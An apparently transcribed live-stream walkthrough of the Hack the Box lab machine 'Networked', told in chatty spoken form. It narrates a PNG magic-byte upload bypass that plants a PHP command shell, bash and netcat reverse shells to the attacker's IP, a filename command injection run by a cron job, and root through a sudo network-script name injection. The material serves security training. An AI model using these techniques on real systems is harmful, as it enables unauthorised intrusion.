All right, there we go. There we go. Sorry, some audio issues, but it's all right. We're back. We're back. Look, check it out. It's me, Cyber Warrior. This is CyberWarriorStudios, and of course, it's Tech Tuesday. So there were some issues. I didn't think I was going to get the chance to actually go live today, but thankfully, all that worked out. So we are live, and we are going to have some fun here today. All right. For some reason, my audio is not working right. So, can you hear me? All right. I don't know what's going on with my audio today. I'm trying to figure it out. We'll get it there though. We'll do what we need to do. So either way, look, check it out. Today we're going over Hack the Box Networked. All right. So I hope you all can join, and you know, have a little fun. Thanks, Tristan. Yeah, I look, I'm late today. I'm sorry. I apologize. I was actually pissed off outside having a cigarette whenever my internet came back on, so had to get in here and hurry up and get set up. So we're gonna make big things happen, though. Don't worry. So let's get logged in, and let me pull up what I need. So I need. Oh, I closed out of what I wanted. No. All right, let me fix it. Let me fix it. Where we at? Let's restream. Hack the box. That's what I needed. Cool. So, is this fired up? Let's get networked fired up. What do you say, guys? Where's my play button? Where are you at? Where are you at? Let's go. Man, I'm not a fan of their new dashboard and the way they do things. There used to be like a play button. Now I gotta find it. Alright, so we're gonna go back, make sure we're actually up and running. Oh, networked. Again, I apologize. I'm all out of sorts today because of all the nonsense. But that's okay. We'll make it happen. Pull this back up. Content. Where are we at? Live control room. Alright, so we're spawned. We're good to go. Let me take a look now and pull this up. No, we're not checking for updates. But we are going to go full screen. And while I'm here, send some other messages along. And actually, let me find. Do I have it here? Ah, crap, it's not there. Let's see if that is. Where is. There we go. I've made it, Al Hazard. I'm late, but I'm here. I'm here. Spread the word that I am live, please. Let them know I was able to make it. And now, let's copy so I don't have to do this in the future. Where is it? HIJK Lab. I wanted to start earlier, All Hazard. I was telling him on Twitter that my ISP went out. All right. What? Oh crap! That's why. There we go. All right, so we want open VPN lab. Come on. So look, if anybody can answer me why you can't use autocomplete. Oh. Did I do that wrong? I did. I forgot that. But you can't use autocomplete with OpenVPN. I'd greatly appreciate it. So yeah, let your friends know. We're live. We're here. Oh, come on. Oh, I know what's wrong. Dang it. I fixed this last time. So, I've told you guys before, and I got to fix a non-serve. Yeah, it's a non-serve. It's starting automatically. And when it does, it isn't starting right. So, it's breaking. Yeah, I don't care. As long as you're dead. There we go. Now we're good. Alright. So, let's bring this up so that we can see what we're doing. Not that. That's not what I wanted. I wanted this one. Yeah. So we're going to go into networked. And the first thing we're going to do is we're going to take a look at our IP. Our IP for this is 10.10.10.146. The other thing is the box is named networked. And oddly enough, yes, I was having networking issues. All hazard. So, in order to get around this, there's two things with just about every hack the box machine that you should do. The first is, of course, note the IP. The second is when you go into your machine, let's do a new tab, file, new tab, and you do I just like running from root, makes it work better. We do cat Etsy host. All right, so you can see I already have one hack the box machine in there. So we go vi Etsy host, and I always add them just down here. Now, not all the machines require this, but I run into enough that it makes it worthwhile to just immediately add these in. So 1.6, I believe it was. Was it 1.6? 1.46. All right, I was close. And then you just type in networked.htb. Escape. Right, quit. All right. So now our Etsy host file has that in there at the bottom. So now it's considered a what's the name I'm thinking of? It's a virtual host on their server. So if you go to the IP, you'll get one thing. But if you actually go to the name, due to the way networking and the way they have it all set up, it ends up being something, you get something completely different. But we already have that in there now. So let's start off with what I usually like to do. So we're going to create a new folder. Do I have a hack the box? I have that. We're going to make a new directory. Make dir network. All right, cool. And so we now have empty directory. And actually, let me make this bigger so you guys can see this. And we're going to go with good old nmap. C-SB -O-A, and we're going to call this one networked service scan, and we're just going to do 10 out of 10 out of 10 out of 146. Hit enter. So we're going to let this run. I didn't do verbose, so I'm not going to see anything until the results come out. But yeah, All Hazard even said on Hack the Box, it is common that you take the name of the box itself, and put it into your host file for the IP so that it can do its DNS resolution. Again, there's more that goes into it as far as why that works, why it doesn't work. It's not part of this. All right. So, what we have here on quick look is SSH is open, port 80 is open, and port 443 is closed. Now, I know this is a Linux system. Hack the Box tells us it's a Linux system, but I always just do OS guessing to see if it gives me any other information as far as kernels and things like that. But saying that, let's go through and let me pull something else up here. Gotta find it. Yeah, I don't care what they say. I like looking for names. So, the way this one's done, and the way we go through port 80, alright, is the first thing I like to do is take a look. So we're going to go here. We're going to open up our browser. We're going to see what's there. Let us see what is on port 80. So we know it's a server. Come on. No, we're not restoring our session. So, first, let's try it with just the IP. Alright, so we got a little welcome screen here. So, you could go in and do view source and see if there's anything there. Alright. So we see right here that there's going to be an upload and gallery. And let me zoom in on this for you so you can see it. Upload and gallery not yet linked. So they apparently have two other directories within this that aren't linked to their page, which is fine. What's going on, Infinite Logins? So it's not a problem. But we don't necessarily know if what the name of those files or links are going to be. We can assume, right? So we can go in and we can assume that if we go to like upload dot whatever or gallery dot whatever, that we'll get somewhere. But it's not always good to make assumptions. I mean, for some things it is, but you always want to be sure because you don't necessarily know what the extension is because it could be HTML, PHP, ASPX. A lot of different web extensions out there that you could cycle through and just hope you get lucky. So one of the things that we can do, and before we go and do that, let's see what happens if we go here. See if it gives us something different. No, same thing. And view page source of this. And the exact same page source. So, all right. So we know we're going to be looking for upload and gallery. Cool. So how do we find that? So this time we're going to go through and we're going to look for, we're going to use a different tool to look for directories. We're going to use GoBuster. Some people like it. I've used it. So we're going to give it a shot. So we go GoBuster and -u, our directory -u, ACP. Now in this case we can use either one, the IP or the name. We're going to use the name because guess what? You never know what you're going to get when you do that. Directory. I need a list. Let me find my word list. So, file, new tab. CD, user, share. User share? OS. Oh, crap. Sudo su. Go. Oh, that's go object, which go buster, user bin, I need a word list. Where's that at? Where's that at? Where's that at? Without having it, I know I used one before. So let's do cd ls cd opt cd seclist ls cd. Let's go to no discovery maybe. Web content. Hey, there we go. All right, so now we know where it's at. So I'm gonna do copy v. All right, and directory list 2.3 medium. All right, and T100, and we're gonna look for PHP files. Well, we've got an uploads directory. We got upload.php, photos.php, and of course our index page. Yeah, that's right. We don't care about the timeout. We did find some other things too, though. We got backup, which gave us a 301 error code. So it's a redirect. So what happens if we go to backup? What do you guys think? So let's go to backup. And we got a tar file. So let's save this file. Okay. Not that we're necessarily going to need it, but let's take a look at it. And we go back to here, cd, home. There it is. Tar crap. XVF. XVF. Backup of tar. All right, so now we actually have backups of their pages. Interesting. More upload. See what this upload page has. So it's PHP. And we have in here a check file type. So it's looking for files, my file. Oh, and we have the upload directory. So we know it's going to this uploads directory, which is good. Let's see. Files, temp name. File size is less than 6,000 bytes. If none of this is true, echo invalid image file. So a lot of times when we see uploads, we can normally take advantage of some type of PHP reverse shell, especially if it's a PHP page. So let's go and check out this uploads.php. Let's give it a look. Uploads.php. Upload. Did I spell that right? There we go. All right. So zoom in. So all it is a browse and go. All right. So let's browse. And what do we have here? Anything? Any pictures? No? No? Index. That. All right. So let's go get ourselves a picture. So google.com. Okay, got it. Whatever. Parrot. Why? Because I'm on parrot sex, so we're going to use a picture of a parrot. What's going on, Ralphie's? Images. We just want a simple image. So we're going to have some fun. And we want... I don't want an ad. Why do you show me ads? we're going to take this beautiful parrot right here. Why? Because I can. And we're going to go here. Save image as. And parrot. And we're going to put it in pictures. Pictures? No. Come on. There we go. Save. I'm going to save this JPEG image. I'm going to put it there, right? Yep. All right, cool. It does take JPEGs. So let's go back here. Let's go to Browse and Pictures. And let's put this fun little parrot there. And we're going to say Go. Invalid image file. Interesting. So why was that invalid? Anybody know? Did we miss something here? Alright, .jpg, PNG, GIF, and JPEG. And if we look at how we saved that, so let's quit out of this. Pictures, ls, JPEG. JPEG. LSSLA. Oh, because it's huge. Alright, so let's go to something a little more simple. Apparently the file type is too big for them. They don't like it. So, black box. That's all we want. Make it something easy. 320 by 320. Save image as. And sure, save. Now let's see how big this one is. Alright. That's a lot less size. So we're going to go here, browse. We're going to take this one and go. That one worked. So now, let's go to gallery. Oops. Oh, here. Refresh gallery. Gallery. Why am I not getting gallery? Oh, because it's right. We've seen the links. It's photos. Hey, there's a gallery. And there's what we uploaded. And when we uploaded it. So we can see this. And then we have the file name. Which is awesome, right? So we have that. So how do we break it? How do we do something that is going to mess with this? So one of the ways we can do it is by altering the file, right? So if I go, let me pull some up here. So, history. Where at? Let's go here. And let me see. I think it was this one. All right, yeah. So what we can do is we can actually the rest of the screen I had to leave around the time we started looking dirty cow. Oh, I remember that exploit. So we'll call it pwn.jpg just for fun. And then because of the way this works, and to explain it, we looked at the code and a little bit and how it does its check on files. So it's checking for size and it's checking for extension. But after that, there is a what is it? There is another, why can't I think of it? There's another way to take advantage of this. And in where is it? So, like some scans, right, and some other various tools, when they're trying to block out what you can and can't do, it only looks at the last extension. Which, okay. So what we do is we go ahead and we can actually create one of two things. We can, the first thing we're going to do, to be honest, is we're going to see if we can get this to give us a username. So to do that, we're going to pass a whoami command into the picture. So you do echo, PHP, test, or what do I call it? Own.jpg, and then echo pass through. Now there's other ways you could do this. You can actually create a PHP file and then give it the magic bytes to make it think it's also a image. But we just grab an image and alter it by passing text into it. So we're gonna do that, and then yeah. And then we move that to, keep in mind the way this the checks are going, and when you upload an image, it's only looking at the last extension. It's not looking at the fact that it's a double extension. So then we take that and we go back to upload, and we go browse, we go open, and we go, and it worked. So we have something here. So let's go to photos, and now we have another one. So we know that we need this. So let's go here, and since we can't click anything, right, we can't see our image, but we know where they're stored. So they're stored in upload, I believe it's uploads, and there it is. So we have it. Now, did it work? Doesn't look like it worked the way I intended. So it did not work as intended, which is fine. It means I did something wrong. You know, we do that. It happens. But we are able to bypass one part of it. So cool. Let's do this a little bit differently then, since that way didn't work. Like I said, more than one way to skin a cat. So what we're gonna do, is we're going to do, that's it. We're gonna say vi pwn2.php, and then we're gonna create a PHP file. So why aren't you working? There it is. Whoops, wrong way. We're gonna go here, PHP system, and this is just gonna create a generic command injection. Request. Oops. cd. Okay. And there. All right. Escape. Right quit. All right. So we have that. And then in order to make it think this is an image, we have to look up the magic bytes for PNG, right? So we're going to use a PNGs because a lot of the other stuff I looked up, PNG is always what's used. So PNG magic bytes. Wikipedia. And the priv-esc was an outdated version of screen. Oh, you're okay. Where is PNG? So Control F, PNG. And we want the next one. There it is. All right, so here's our magic bytes. So we copy that, paste. Let's do here. Echo. And we're gonna do, so we're gonna do XXD. Oops, P-R. And we're gonna say pwn2.php.png. Am I doing this right? I think I'm doing this wrong. Hopefully not, but I might be. Oh, okay. So we're gonna call this 3. All right, and then cat 2 into 3. All right. Now let's try it. So now we go back here. We go back, refresh, cancel. Lin Pease is awesome, All Hazard. I love it. Let's go. All right. Let's go back to photos. All right, we have a photo, but we don't see anything. But let's see what happens when we do this. So now we're going to go to uploads, Control V. And since we inserted a command injection, we're going to say here cmd equals, where my ID. Haha! And it works. What do you know? So now we have a command injection. Reverse it. So we can do a reverse shell with this. Yeah, man, it happens all the time. If you can upload something infinite and use any type, like if you can double up your extensions or find a way to confuse the system and make it think it's a image instead of just a PHP, then a lot of times you can do things like this. So yeah, it's pretty crazy. So we have that. All right, cool. That's awesome. So what's the next thing we want to do? So the goal is to get a reverse shell. A few ways you can do it. A lot of what people will do is either curl or type it into the URL itself. We're going to use curl. That way we can do everything through command line and I don't have to worry about it. So we know the image is there. So this is the URL that we're going to go to right here. So we're going to use curl-g data URL and code. I need to start up a reverse shell real quick. NC dash LBNP. Good port to use would be 5004. No, not that one. We're just gonna use 443 just because I like using 443. See if it works. And so our CMD equals bash dash C bash dash I. And if you look it up, because we don't know if netcat or anything is on there. Now through the URL, the command we have here, the remote code execution that we injected, we could see what's installed. There's a lot of things we can put into here and reload and get to work, but we're just gonna do it this way. And we're gonna do a reverse shell dev dash TCP. Oh crap, what's my IP? I have config 10.10.14.26 10.10 on 4.26 and 443 0 1. Whoops. I do that right? I do that right? Yeah. All right, cool. So that closes all out. And then we put in the URL. Whoops. ACP. Whoops. Shift B. And we don't need that command there anymore. So we just do that. And let's see what happens. Oh, helps if I hit enter. Oh, I can't. Oh, dang it. Sudo su nc lvnp 3. There we go. Now let's try it. Hey. We have a shell. So we've got our first reverse shell. But here's going to be our problem. We're Apache. Not necessarily who we want to be, right? Because if we go cd home, there's a GUI there. So cd GUI ls-lha. So we have that user.txt file. I'll tell you right now, we can't read it, nor would I bring it up on screen even if we could, because I'm not going to give away keys. But yeah, GUI is the only one that can read that. No one else. Then you've got a cron tab, which is read write by root, but then you got read by everybody else. You've got a check attack.php, which is read. All right, so we should be able to read that. And then, of course, you got your bash profiles and things of that nature. So what do we do, right? What's the first thing we want to take a look at? What do you guys think? Do you want to take a look at cron tab or check attack first? PHP is fun as long as you can figure it out. Looking at complete PHP code is a bitch. But so check attack, you're saying sounds fun. Since we're saying PHP. All right. But here's the question. So we're going to look at this. So we're going to do, oops, helps if I'm in the right thing. Cat check attack.php. So we're going to read it. If we scroll up here, what do we have? So require lib.php, path, uploads, log path is this temp attack.log. All right, we got another variable to GUI. And then we got a message, it's blank, headers, xmailer, check attack.php files. We've got an array. All right. What else we got here? So we've also got this print check value, list name, execute rm-f log path, execute nohup / bin. So this nohup, so this /bin / rm-f path value is interesting because this is executing from the root bin directory, not like a user's bin file. All right. So then from there, what's it looking for though? Where is it looking for the export or the, where's that path being passed at? So we've got path here with uploads. And where's that path go? rm-f, but it, do we see this attack? rm-f, path value, mail to. So it's doing a check. Check IP name value. List name extension equals get name check value. It isn't. Oh, come on, Alhazer. PHP can be fun. Especially when there's a command injection. So what this does is, if you upload an invalid file, right, or if somehow something gets uploaded that is invalid, it removes it. And we can see that by this execute rm-f log path, and execute bin rm-f path value. So path is uploads and value is what you're uploading, print check value. All right, so okay, so we know it's doing this rm. The thing about it is there is a way that you can do a command injection because it's not sanitized. The value variable here at the $path, $value. So because it's not sanitized, because there's nothing stopping it, this /bin/rm is going to execute as root. And there's actually, let me pull up this because I had to find the right link for it. Whoops. Let me pull this link up for you guys. Actually, this isn't going to execute as root. Apologies. This executes as GUI because of who's running it. So we're going to execute this and do it as GUI. So in order to do this, what we're going to do is we're going to create a file and put it in that uploads folder, right? So we're going to cd var www HTML uploads. And then we are going to put a file there that isn't right. So control sudo su nc-lbnp 4444. We're going to use the Metasploit port. Why? Because it's fun. From here, we're going to say, let's see, how do we want to put a file here? Where's what I'm looking for? So we can echo a command. We can put a command in here. And it will execute. So in order to do that, They'll never see it coming. What we're going to do is we're going to use a different way, or a different shell. We're going to see if they have netcat here, which NC. User bin NC. NC version 7.5. Okay. So let's see what we can do. So we're going to say touch NC 10, 10, 10, 26, 4444, command, bash, and we're going to put it there. And ls. So we literally created a file name that executes command. Because when this executes, this $path, $value with no sanitization, so it's going to put the path there, but then the value, right, is this semicolon and then the netcat command. By doing that, that semicolon is just breaking up that command and telling it to execute the next command. So the next command that it's going to execute is our netcat command. And now if we want to see when this will execute, and this is what you all missed because we jumped straight to the PHP. Oops, tab.gulY. Oops. Tab.gulY. Is every 3 minutes, it runs that check attack. So you're going to have to wait, depending on when it ran last, up to 3 minutes. But then it'll execute and kick back to you. Any questions so far? Any ideas? Any problems? Something you're not understanding? I mean, because we got time. At least 3 minutes. I still have one. Why couldn't I find the channel fast? So I only came on Twitch recently. I only started doing Hack the Box last week. But I'm glad you found me, Tristan. I am on YouTube and Twitch. And I do have my own website, CyberWarriorStudios.com. So Twitter and everything else. And a Discord server. So I'm glad you found me. It takes time sometimes. But I've been around for about a year. Almost a year. Ralphie, just tune in on Friday, man. You'll really see me grabbing beers. Because at that point, I'm just talking. I'm not typing at all. Come on. Can I kick off? See, and that's interesting. That's what I'm trying to get around, and that's why I like doing these live. Is A, because then you can ask questions and get an answer, and B, because, you know, I've seen people go through and just fly through it. They're like, do this, do that, do the other thing, without explaining anything or why it works or why this works. And I'm not going to lie, I didn't do these for a while because I figured you can't spit without running into somebody doing a hack the box or a try hack me or something along those lines. But I've found that people still learn differently. So giving others the ability to go through and learn it, that's what I'm about. See if this actually executed because I'm not getting it. Did I lose my connection? No. All right. Why is ls-la not working? That's still there. Look, like I said, man, I mean, some people need an explanation, especially now that we're not able to do a lot of in-person stuff. I learned by being able to raise my hand and ask questions. I'm more of a traditional learner. So, just how I am. Apparently I broke something. Because I'm not getting a listener back. So let's do this. Let's kill that. Let's bring that one back up. And let's kill that and run it again. Hopefully it's still there. No, I've completely lost my connection to this box. Is that upload gone? Awesome. That's fantastic. That would be why. No, I lost my internet. Again, well, I lost my connection to the server. So, let's see. Come on. Come back to me. Nothing. Alright, so we got that. Alright, as long as I'm not alone. So we're going to upload the new one. We're going to upload that again. Go. Alright. We know it's there. We know what it issues. We're going to do the same file. Hey, okay, I have job control. So, CD. Am I still listening on this port? Yeah, I am. All right, cool. Var. GUI. ls. Cat. Check. P. And what's that path? Var www HTML upload. CD var www HTML upload. ls. Alright, so it's still there. So we have that. For some reason though, our cron job. Did I put the right IP in there? Did I put the right IP in, guys? Did I? IF config 1010. Ah, no, that'd be why. See, y'all didn't correct me. I put the wrong IP in. So, touch. Let me validate my command again now. NC 10, 10, 14, 26, 4444 dash C bash. Right. Alright. Yeah. Enter. LS. There it is. Now it's the right IP. See, I broke it last time. I had the wrong IP. I was connecting to itself. So let's do RM NC 10 10 10 26 4 C bash. Hey, we've got a connection. Who am I? Ghoulie. All right. But before we go any further, we're going to get ourselves a better show. So we're going to say Control Z, I believe. Yeah, Control Z. We're going to background it. All right. And then we're going to say STTY. And I always have to look this up, so don't mind me. Echo. FG, enter. Oh, did I break it again? I always screw this up. Alright, let's kill it. We're gonna kill this window. We gotta do it again. Yeah, we're gonna close it. Sudo su. I have a habit of breaking those. And it's still there, so it's still going to execute again. So it'll go. Which is fine. We'll get it. But the question remains, why did that break? What did I do wrong? I'll go ahead, man, grab a beer. I only got like 3 minutes to wait, or should. Make sure that's still there. ls-la. Yeah, it's still there. Should execute again. We're just waiting on it. 4444. 4444. I could do it another way. So just to be safe, we're gonna we're gonna create another file. Only this file is gonna be created a little differently. Well, it's gonna be created the same way, but it's gonna have a different command in there. We're gonna use the other command that we've used before. So we're gonna do echo-n bash-c bash-i dev tcp I don't know if I like that one. There we go. Never mind. Don't need to do it. We have it. Hey. So, ls, who am I? Ghoulie. ls-la. Alright. So if I wanted to look at user.txt, I could. Not going to do that. What I am going to do is I'm going to do one of two things. Now, we can do this manually, which is what I'm going to do. The other way is you can download things like linpeas, linenum, or LSE, and look at what options you have to enumerate the system. Being that I'm running short on time, we're going to do it the quick way, and I already know what this vulnerability is, so I'm going to tell you what we need to look at. And for this particular one, you need to, like on many other Linux systems in poor administrative settings, look at the sudo's capabilities. So to do that, we do sudo-l. So we see here that Ghoulie can run a program that is called, or run a script with no password, that is user local sbin changename.sh. So I can literally go to sudo, say sudo, run that command. What I'm going to do is I'm going to see what it says first. So we're going to do sudo cat. Actually, we ain't even going to sudo it. Let's see if I can cat it first. User local sbin. And yes, this would pop up on any of your scripts. All right. So in this, there's actually an issue with this. And there's a reason why this is vulnerable. And there was a release or a disclosure that came out a while ago. And it is dealing with how network scripts run. So anything that gets put in that network scripts directory runs as, well, not anything, but a lot of what gets put in there will run as root. So let's pull this up here. Let me make this a little bigger for you guys so you can understand this vulnerability. So, according to Red Hat security team, it's not an issue. But if you're able to write an ifconfig whatever script to network scripts, then you can effectively gain root. But how? Well, in the way that name is, in the way the name attribute in the network scripts is not handled correctly. If you have a blank space in the name, the system tries to execute the part after the blank space, which means after the blank space, or everything after the first blank space in name is executed as root. I say again, it is executed as root. So let's see what this script does. Let's go back to it. So we see we can execute it, and we see that it's going to give us variables: name, proxy method, browser only, boot protocol, do whatever. All right. So what if we just run it? No, it's not an issue, Tristan, not at all. So we're going to do sudo, and we're going to say user local sbin change name .sh. What's it do? Interface name. All right, what do we want to name this? We know this is the vulnerable field. So we're going to say name equals pwned space ID. Enter. Pwned. And we're root. We executed it. Awesome. So now what we do is we have a little fun. We're going to go here. Sudo su nc lvnp, because at this point we're root. We're just gonna say we're elite just for shits and giggles. And we're gonna run the exact same script. Sudo user local sbin change name.sh. Enter. Interface name. What we're gonna do, let's go up here. Let's find our file name. Where's our file name? Our file name is here. We're gonna run this exact command, only so nc and then -c. Okay. Pwned space nc 19 or not 192 10 10 14 26 1337 -c bash. Enter. Wait, I gotta put it all as one. Pound nc 10 10 14 26 7 bash. It doesn't like that. How we gotta put this in here? What am I doing wrong? I know that's what I gotta do. Just gotta figure out what the hell I'm putting in wrong. Oh, man, I'm going about this the hard way. No, we don't even need to do that. We don't need a reverse shell. What am I thinking? Pwned bash. And we're now root. You have been pwned. And I could read that if I wanted to. But again, this is live. And I'm not giving away their secrets. Dude, so here's the thing, Tristan. It isn't about making it look easy. I've been doing this for a long time. And it's all about enumeration. It's the same thing when anybody's going for their OSCP or any other ethical hacking certification or becoming a pen tester or a red teamer. A lot of it comes down to being able to enumerate. Now, I happen to have been doing this long enough. I know a lot of different sites or different places to look for things. Yeah, they do that, All Hazard. I get it. They're dynamically generated. But still old habits. I don't like showing the keys. But I get it. That's why they did it. And why they dynamically generated it. So that you'd have to go through and do it on your own. Like, you can't open up their PDFs and use their keys to just claim flags. But no, so it's all about knowing where to look. And if you look at, and one of the ways, Tristan, you can really figure out how to enumerate, say, like a box itself, is to look at scripts like linenum, LSE, and linps, and see exactly the data that it's enumerating. Right? Look at what it's pulling for. So any pseudo privileges are usually gathered when you do sudo-l, cat etc sudoers. What else? A few others. Then you'll get your ports from netstat. Netstat-a-no. If it wants to work. Netstat. Nah, doesn't want to show me netstat. Might not be there. Or it'll be a different one. IPA. We'll give you your IP addresses. IP-A. How are those spelled? How is what spelled? So you have, here, I'll put them here. I'll put them in the chat. You got Lin Peace, Lin Enum, and LSE. And if you look up, if you Google, DuckDuckGo, Bing, whatever you want to use, if you look up those scripts and say GitHub, so site, GitHub, or not site, Insight, I think it is. No, it should be site, if I remember my Google Dorks correctly. GitHub.com, and then you want Lin Peace. So a search like that on Google, we'll search github.com for Lin Peace, and it should find the repo, because all these are repos. So I could go here, and actually, because I need them anyways, so I might as well. See, site, github.com, LINPEAS. And there it is, Lin Peace, master repo. What I do, though, Sloth Boy, man, let me know. Enumeration is key. Most definitely. So I'm going to copy this, because I'm going to grab this entire repo. CDC. You know, we'll put it here. Git clone. Oh, that ain't what I want. Code. Come on. Copy. Git clone. There it is. So I'm going to grab those. So that's going to give me all Lin Peace. Lin Peace and Win Peace. One more thing, and I'll probably do a Windows box next week as long as my internet doesn't go out, so that you guys can see this. If you are enumerating a Windows box, like you're on it locally as a basic user or service user or whatever the case may be, and you try to execute winpeace.exe and it does not work, or you get nothing back, or there's no display, there is a very high probability that that's because of UAC. So your UAC is trying to pop up and say, hey, do you want to allow this? The way around that is use the .bat file. The .bat file will execute without any issues. And again, this is only on Windows. So if you go here, you go to WinPeas, you'll see there's an exe and a .bat. That's why. All right. The .exe is great, but .bat will work no matter what. So it's a little food for thought. Some things I learned as I went through OSCP and things of that nature. Again, these exploits, and I'm going to let you guys go. Again, I'm only on this late because I got on late. But these exploits like sudo files and improper sudo permissions, PHP uploads, command injection, they're all things that are found in the wild. Companies still fall victim to this. So yes, though there are boxes and though there are things that seem very CTF-ish, and by that I mean it's something you would think a company would never do. Understand, companies do these things. May become fewer and far between, but they do these things. All right, whether it's some lazy admin creating a script so he can, make his job easier, it's fine. But if he doesn't sanitize things properly and that system gets pwned, now that script can be executed and utilized against them. Sloth Boy, thank you for following, as well as you, Tristan. So, like I said, man, I hope you guys all enjoyed this. I loved having you on. It's always fun doing these things. Make sure, if you're not following me on YouTube, I'm so close to 1,000 subscribers on there. Go ahead and check out the CyberWarriorStudios YouTube channel. Once I get to 1,000 subscribers, I am going to be doing a giveaway. I don't know of what yet, but I will be doing it. And then on top of that, if you want to support us in any way, shape, or form, go ahead, take a look at any of the descriptions. If you're on actually, or you could just head over to CyberWarriorStudios.com and let me know. I do have a Patreon. I do have, let's see, Patreon, buy me a beer. Well, buy me a coffee, but I say buy me a beer. And a few other ways that you can support, but those two are probably the best. White's Tech, man, you made it. Good to have you here. Infinite, I don't even know what my watch time is. I don't even care. I'm not trying to get partner with anybody. I have the ability on Twitch to become an affiliate, and I refuse to do it because then I'm isolated to just going live on Twitch for 24 hours, and I don't want to do that. So I don't know if I'm ever going to partner with YouTube. I just set goals of I know people will actually be here to watch. So White Tech, go ahead back, man. If you missed it, I got on late, but if you missed it, go ahead back, take a look, watch the feed. I am happy to have you here. And again, everything's in the description on YouTube or on CyberWarriorStudios.com on how you can support us. Other than that, it's been great having you all on. I love you all, and I am very happy to keep giving back to you guys. So have a great night, and I will catch you all next time.